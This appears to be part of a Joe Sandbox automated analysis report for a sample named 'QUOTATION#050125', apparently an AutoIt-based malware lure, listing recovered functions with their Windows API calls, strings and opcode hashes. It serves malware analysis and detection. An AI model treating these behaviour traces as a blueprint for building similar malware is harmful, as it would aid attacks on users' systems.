InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00513E92
DrawMenuBar.USER32 ref: 00513EA5

Strings

0, xrefs: 00513D89

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 60ef81afce6cfb10d718b71634d7c0f26db6f4ee9099e3a8691413769a98929a
Instruction ID: 12038d2d09ceefceeb9f80e55ac6bc56b073a2c672f8c03b4cd8059a7702388f
Opcode Fuzzy Hash: 60ef81afce6cfb10d718b71634d7c0f26db6f4ee9099e3a8691413769a98929a
Instruction Fuzzy Hash: 74414A75A01309EFEB10DF50D894AEABFB9FF49354F044229E905A7290D730AE88DF50

Function 004E1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004E1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004E1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 004E1EA9

Strings

ComboBox, xrefs: 004E1DF0
ListBox, xrefs: 004E1E25

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$ClassName
String ID: ComboBox$ListBox
API String ID: 787153527-1403004172
Opcode ID: a831f69ce6b2342076fd6fc528c1862422c8b7cc43cf645bd01cdd944e136290
Instruction ID: c9be0de186727b28819c2cefdedb75daeee5fb92c7d7b8875bea491064adc093
Opcode Fuzzy Hash: a831f69ce6b2342076fd6fc528c1862422c8b7cc43cf645bd01cdd944e136290
Instruction Fuzzy Hash: 0C212671A40144AFDB14AB6ACC49CFFBBB8EF41359B14451EF822A72E1DB3D4D0A9724

Function 00512F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00512F8D
LoadLibraryW.KERNEL32(?), ref: 00512F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00512FA9
DestroyWindow.USER32(?), ref: 00512FB1

Strings

SysAnimate32, xrefs: 00512F68

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 791062cd06ff651328b3d353587e51eac1b8d79980bf771459f6715fa61b97e4
Instruction ID: aa3da7d90b375c11dafbda0279c1eb017101bf4c06edceba4c19d979b95b568f
Opcode Fuzzy Hash: 791062cd06ff651328b3d353587e51eac1b8d79980bf771459f6715fa61b97e4
Instruction Fuzzy Hash: D021AC71200209ABFB104F64DC86EFB3BBDFB59368F104618F950D6190D771DCA2AB60

Function 004A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004A4D1E,004B28E9,?,004A4CBE,004B28E9,005488B8,0000000C,004A4E15,004B28E9,00000002), ref: 004A4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004A4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,004A4D1E,004B28E9,?,004A4CBE,004B28E9,005488B8,0000000C,004A4E15,004B28E9,00000002,00000000), ref: 004A4DC3

Strings

mscoree.dll, xrefs: 004A4D86
CorExitProcess, xrefs: 004A4D98

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 732d79603c7da2f8e2caf2181fca9cb7a85196a4992264cbc3af883ff36f837a
Instruction ID: 12447f90448b8178ab5bce5e22f3ed22798b0009490257d7c23afdc26cc3ef01
Opcode Fuzzy Hash: 732d79603c7da2f8e2caf2181fca9cb7a85196a4992264cbc3af883ff36f837a
Instruction Fuzzy Hash: 1AF0C234A80218FBDB109F90DC49BEEBFB4EFA5711F0440A9F809A62A0CB759D45DB94

Function 00484E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00484EDD,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00484EAE
FreeLibrary.KERNEL32(00000000,?,?,00484EDD,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484EC0

Strings

kernel32.dll, xrefs: 00484E94
Wow64DisableWow64FsRedirection, xrefs: 00484EA8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 6c570ad0443310813ed11438a4abb8972aaea76896f1f3d7f725fe78f3d96687
Instruction ID: cb70a2a0f1d27954629844c7b0a7c2ba053b8f613f38f8dc9a2e5398d513fd7c
Opcode Fuzzy Hash: 6c570ad0443310813ed11438a4abb8972aaea76896f1f3d7f725fe78f3d96687
Instruction Fuzzy Hash: 7DE08635AC16236BD2212B256C18AEF6E54AFD2B637054516FC00E2310DB65CD0591A4

Function 00484E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,004C3CDE,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00484E74
FreeLibrary.KERNEL32(00000000,?,?,004C3CDE,?,00551418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00484E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00484E6E
kernel32.dll, xrefs: 00484E5B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 30b96d8fcfc06d671016e0bfa3b5af8d6a0d93674ccaaf625b648e385ff73285
Instruction ID: 339c5958204f828d81c1c077268645139b625fb39b8982d99ab7f8430bfaa3b4
Opcode Fuzzy Hash: 30b96d8fcfc06d671016e0bfa3b5af8d6a0d93674ccaaf625b648e385ff73285
Instruction Fuzzy Hash: BDD0C2315C26226796222B246C08DDF2E18BFC1B213054912B800E6210CF26CD01E6D4

Function 004F2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F2C05
DeleteFileW.KERNEL32(?), ref: 004F2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004F2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F2CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004F2CC0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ee526248cfe5012b01b204c27cec30317de699b2e89edea60d9610e42e85012b
Instruction ID: f3e980a74e479b9e9471f1c0b04c0be697628ddc9268306d872d99c83102dffd
Opcode Fuzzy Hash: ee526248cfe5012b01b204c27cec30317de699b2e89edea60d9610e42e85012b
Instruction Fuzzy Hash: B6B16D71D0011DABDF10EFA5CD85EEEBB7CEF09354F1040ABFA09A6141EA789A448F65

Function 00501C60 Relevance: 7.8, APIs: 5, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00501DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00501DE1
WSAGetLastError.WSOCK32 ref: 00501DF2
inet_ntoa.WSOCK32(?), ref: 00501E8C

Part of subcall function 00503224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,004FEC0C), ref: 00503240

htons.WSOCK32(?,?,?,?,?), ref: 00501EDB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3163710072-0
Opcode ID: 84d7235fd2d8f200d17714ebf69ce3d9c705648cbbef5b7b5aa6ecac671c54df
Instruction ID: 08ad1537487d0d7b89931ac3ff88182b35c82c507adcb103fad9f7ac7a8fa3f1
Opcode Fuzzy Hash: 84d7235fd2d8f200d17714ebf69ce3d9c705648cbbef5b7b5aa6ecac671c54df
Instruction Fuzzy Hash: 79B1FC31204701AFC724EF25C885E2E7BA5BF84318F58894DF4565B2E2DB31ED42CBA6

Function 004C1522 Relevance: 7.8, APIs: 5, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004C15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004C1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004C17FB,?,004C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004C16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004C16FB

Part of subcall function 004B3820: RtlAllocateHeap.NTDLL(00000000,?,00551444,?,0049FDF5,?,?,0048A976,00000010,00551440,004813FC,?,004813C6,?,00481129), ref: 004B3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004C1777

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapInfo
String ID:
API String ID: 1443698708-0
Opcode ID: 1437e193f45fc9d8b70dea9c7fc17c8c24667873ca1feec8cfa7c135bc4e9ad0
Instruction ID: 34bb0f196a385a06afcbadc60034e58a8f3879ac0f03a984f88732f0d603460b
Opcode Fuzzy Hash: 1437e193f45fc9d8b70dea9c7fc17c8c24667873ca1feec8cfa7c135bc4e9ad0
Instruction Fuzzy Hash: F391D479E01206AADF608E64C841FEF7BB59F4A310F18452FE801E7262D739CC41C768

Function 0050A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0050A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0050A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0050A468
CloseHandle.KERNEL32(?), ref: 0050A63D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: a15e627ffbe90dbb439cf667104d770b5ac3c176ee1028e58015716b98042302
Instruction ID: ac03da5de4bd51edd84cb10787bd47adc5e39e608bc502f110423e1ebd90c030
Opcode Fuzzy Hash: a15e627ffbe90dbb439cf667104d770b5ac3c176ee1028e58015716b98042302
Instruction Fuzzy Hash: 2AA1A071604300AFE720DF25D886B2ABBE1BF84718F14881DF65A9B2D2D775EC418B96

Function 0050B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0050C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050B6AE,?,?), ref: 0050C9B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0050BB63
RegCloseKey.ADVAPI32(?,?), ref: 0050BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0050BBB3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: e24aa137d4d76ba4ff114aad32f98e2b3e63b86c0c3cdffe2cab6ea71aea8ff3
Instruction ID: f4651dd889ede32fea5b28afb910c39cce447c13116f6fe34ea9e8b144b4586f
Opcode Fuzzy Hash: e24aa137d4d76ba4ff114aad32f98e2b3e63b86c0c3cdffe2cab6ea71aea8ff3
Instruction Fuzzy Hash: E0617B71208241AFE714EF14C4D4E2ABBE5FF84348F14895DF4998B2A2DB35ED45CB92

Function 004E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E8BCD
VariantClear.OLEAUT32 ref: 004E8C3E
VariantClear.OLEAUT32 ref: 004E8C9D
VariantClear.OLEAUT32(?), ref: 004E8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004E8D3B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: b2000cb0ab4e0609a732c7a2a3523fbebf091a33df2e04497dabd75a9caab753
Instruction ID: c6df78c7cbee9188c16843f1fcc87d75eb373c2102b3f267f9b9ade29c7ceec4
Opcode Fuzzy Hash: b2000cb0ab4e0609a732c7a2a3523fbebf091a33df2e04497dabd75a9caab753
Instruction Fuzzy Hash: 86517AB5A00219EFCF10CF59C884EAAB7F5FF89311B15855AE909DB350E734E911CB94

Function 004B542E Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(004C3CD6,?,?,?,?,?,?,?,?,004B5BA3,?,?,004C3CD6,?,?), ref: 004B5470
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004C3CD6,00000005,00000000,00000000), ref: 004B552C
WriteFile.KERNEL32(?,004C3CD6,00000000,004B5BA3,00000000,?,?,?,?,?,?,?,?,?,004B5BA3,?), ref: 004B554B
WriteFile.KERNEL32(?,?,00000001,004B5BA3,00000000,?,?,?,?,?,?,?,?,?,004B5BA3,?), ref: 004B5584

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleMultiWide
String ID:
API String ID: 977765425-0
Opcode ID: 2ab1403b64408951cdd3030737e885da0f533f9214aa7042006f29d41e7f98e2
Instruction ID: b0e9326b70ea7959e1e34972951d5f85abb415cbf7d4c2f07605b0a5ff88bae8
Opcode Fuzzy Hash: 2ab1403b64408951cdd3030737e885da0f533f9214aa7042006f29d41e7f98e2
Instruction Fuzzy Hash: C551C0B0A00648AFDB20CFA8D845BEEFBF9EF19301F14411BE555E7291D6349A41CB64

Function 004F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004F8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004F8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004F8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004F8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004F8C5F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 7df9a2db92d5e0849ef3f4367058314bb58770d22fa0fad3f2bbd369e57ce0de
Instruction ID: 36a3acbcd4e12b90a7461aaff768a2b6df4ff09ab8851f5d855c18a939916359
Opcode Fuzzy Hash: 7df9a2db92d5e0849ef3f4367058314bb58770d22fa0fad3f2bbd369e57ce0de
Instruction Fuzzy Hash: 09514F35A00219AFCB04DF55C880A6EBBF5FF49318F088459E959AB362DB35ED41CBA4

Function 00508EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00508F40
GetProcAddress.KERNEL32(00000000,?), ref: 00508FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00508FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00509032
FreeLibrary.KERNEL32(00000000), ref: 00509052

Part of subcall function 0049F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004F1043,?,76DFE610), ref: 0049F6E6
Part of subcall function 0049F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004DFA64,00000000,00000000,?,?,004F1043,?,76DFE610,?,004DFA64), ref: 0049F70D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 2ff854efd3d4aa5a364f892f2eaa7f3252b9227fb3dcdbba5abe1b5b96e9c801
Instruction ID: 910000fd6fe6c57c3a8c8b3e478fa6be51f79cb773c22a7c8a6116dff864d75e
Opcode Fuzzy Hash: 2ff854efd3d4aa5a364f892f2eaa7f3252b9227fb3dcdbba5abe1b5b96e9c801
Instruction Fuzzy Hash: AB513A34600205DFC715EF65C494CADBFB1FF49318B0884A9E845AB3A2DB35ED85CB90

Function 00516B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00516C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00516C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00516C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004FAB79,00000000,00000000), ref: 00516C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00516CC7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ec7928781252c44e27efffd95e7d92c6fcb33175b683205d7a2578bfd64c460e
Instruction ID: 42e17342799869306da5695b794dfe3a88e0a49e9a3003e33a44f344a1539f23
Opcode Fuzzy Hash: ec7928781252c44e27efffd95e7d92c6fcb33175b683205d7a2578bfd64c460e
